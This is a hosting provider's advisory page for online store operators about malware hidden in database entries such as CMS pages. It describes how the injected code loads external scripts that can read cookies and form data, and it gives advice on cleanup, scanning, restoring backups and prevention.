Suspicious database entries
The database contains suspicious entries.
We recommend to have a malware infected store checked by experienced developers or security companies.
When an online store is successfully attacked, the perpetrator often leaves behind his own program code, which he uses to add additional functions to the store (e.g., for tapping personal data or payment data). Because file manipulation is now easier to detect (e.g. by using a version control system such as Git), newer malware methods involve placing malicious code in special database entries. These are usually those whose content is intended to be displayed in the web browser (e.g., CMS elements or pages). The actual malicious code is reloaded by the browser via the integration of external files, but due to the integration on a store page it is also executed in its context and thus has access to cookies and form contents.
Solution & protective measures
In addition to restoring a clean state by removing the malware, it should also be analyzed how the malware infestation came about (e.g., by analyzing the accesses made to uncover the invasion vector) or what consequences the malicious program code entailed.
The analysis of database changes is much more complicated than changes to files, because changes to the database occur much more frequently and cannot be easily tracked by, for example, a version control system. If there are already signs of a malware attack within the database, it is also possible to export the entire database, including triggers and routines, to a dump file and store it on the cluster in order to perform a new malware scan afterwards. This then checks the complete database for malware patterns through the dump file.
To clean up the database, all occurrences of malware must be removed in any case, because otherwise reinfection by the malicious code is easy. Often, the only way to help is to restore a backup from the time before the malware attack, but this does not always prevent a corresponding loss of data.
If you want to migrate your store to a completely clean system, we will be happy to provide you with an additional independent cluster. Contact our consulting department for the conditions and the necessary procedure.
Further recommendations for action
The most common cause of malware infestation observed by us is the operation of old software versions on a cluster. In addition to the store system itself, other applications, such as the blog system or database administration, may be outdated and therefore have known security vulnerabilities. We therefore generally recommend the following behaviors:
- Install all security updates promptly, including those for plugins as well as additional software.
- If necessary, separate particularly critical systems, such as stores with customer data, from systems or development environments that may not be well maintained.
- Do not store backup files, database exports, log files etc. in directories accessible from the web server. These files may contain information that can easily be used to attack your applications.
- Use strong passwords that you do not already use elsewhere.